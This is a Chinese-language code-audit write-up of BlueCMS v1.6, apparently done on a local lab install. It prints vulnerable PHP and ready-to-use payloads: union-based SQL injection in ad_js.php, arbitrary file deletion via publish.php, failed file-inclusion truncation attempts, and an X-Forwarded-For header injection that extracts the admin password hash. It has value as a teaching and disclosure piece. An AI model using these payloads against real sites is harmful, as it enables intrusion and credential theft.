bluecmsv1.6代码审计

本次是对一个简单的cms 进行代码审计作为一个入门，直接用seay进行自动审计

sql注入漏洞在文件 uploads/ad_js.php
这里通过get方式接受ad_id变量没有任何过滤拼接到sql语句并执行

define('IN_BLUE', true);
require_once dirname(__FILE__) . '/include/common.inc.php';

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
1
2
3
4
5
6
7
8
9
10
11

跟到getone函数直接执行了语句

 function getall($sql, $type=MYSQL_ASSOC){
    	$query = $this->query($sql);
    	while($row = mysql_fetch_array($query,$type)){
    		$rows[] = $row;
    	}
    	return $rows;
    }
1
2
3
4
5
6
7

验证漏洞直接访问uploads/ad_js.php?id=1’这里加单引号报错了说明有注入尝试下猜字段数
uploads/ad_js.php?ad_id=1%20order%20by%207%20–+
order by 7的时候正常到8直接报错说明有7个字段
union select 1,2,3,4,5,6,7 --+
7为可显字段,这里如果单独看网页是没有内容的必须点击看网页的源码
union select 1,2,3,4,5,6,user() --+
查看当前用户

任意文件删除在uploads/publish.php

elseif($act == 'del_pic')
{
 	$id = $_REQUEST['id'];
 	
 	$db->query("DELETE FROM ".table('post_pic').
 				" WHERE pic_path='$id'");
 				
 				
 				
 	if(file_exists(BLUE_ROOT.$id))
 	{
 	
 		@unlink(BLUE_ROOT.$id);
 	}
}
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

通过request方式接受id文件名并判断文件是否存在在删除，直接在uploads目录下创建
1.php,直接访问uploads/publish.php?act=del_pic&id=1.php

任意文件包含

elseif ($act == 'pay'){
 	include 'data/pay.cache.php';
 	$price = $_POST['price'];
 	$id = $_POST['id'];
 	$name = $_POST['name'];
 	if (empty($_POST['pay'])) {
 		showmsg('�Բ�����û��ѡ��֧����ʽ');
 	}
 	include 'include/payment/'.$_POST['pay']."/index.php";
 }
1
2
3
4
5
6
7
8
9
10

这里将post过来的pay进行包含不过限制了目录和文件，需要通过截断来实现
通过%00截断失败了

用下路径长度截断

① 条件：windows OS，点号需要长于256；linux OS 长于4096
Windows下目录最大长度为256字节，超出的部分会被丢弃
Linux下目录最大长度为4096字节，超出的部分会被丢弃
用.号来填充
不知道为什么都没有成功

插入注入在评论区ip头信息没有经过过滤便插入到数据库中，我们可以伪造ip头一次性插入多条语句将管理员的密码爆出来
include/comment.php

f($act == 'send')

{
	if(empty($id))
	{
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);
 	if(empty($content))
 	{
 		showmsg('�������ݲ���Ϊ��');
 	}
 	if($_CFG['comment_is_check'] == 0)
 	{
 		$is_check = 1;
 	}
 	else
 	{
 		$is_check = 0;
 	}

 	$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check) 
 			VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')";

 	$db->query($sql);
 	if($type == 1)
 	{
 		$db->query("UPDATE ".table('article')." SET comment = comment+1 WHERE id = ".$id);
 	}
 	elseif($type == 0)
 	{
 		$db->query("UPDATE ".table('post')." SET comment = comment+1 WHERE post_id = ".$id);
 	}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

访问/uploads/comment.php?id=1
写入评论再用bp抓包增加X-Forwarded-Fo的字段

POST /uploads/comment.php?act=send HTTP/1.1
Host: www.blue1.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
X-Forwarded-For: 127.0.0.1','1'),('5', '1', '3', '0', '6', (select concat(admin_name,0x3e,pwd) from blue_admin), '1656396250', '127.0.0.1', '1')##
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: http://www.blue1.com:8080
Connection: close
Referer: http://www.blue1.com:8080/uploads/comment.php?id=1&type=0
Cookie: detail=5; PHPSESSID=83e76a6a5b87ec8abf5aa6639a8571e9
Upgrade-Insecure-Requests: 1

mood=6&comment=ccccccc&id=1&type=0&submit=%CC%E1%BD%BB%C6%C0%C2%DB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

成功的出数据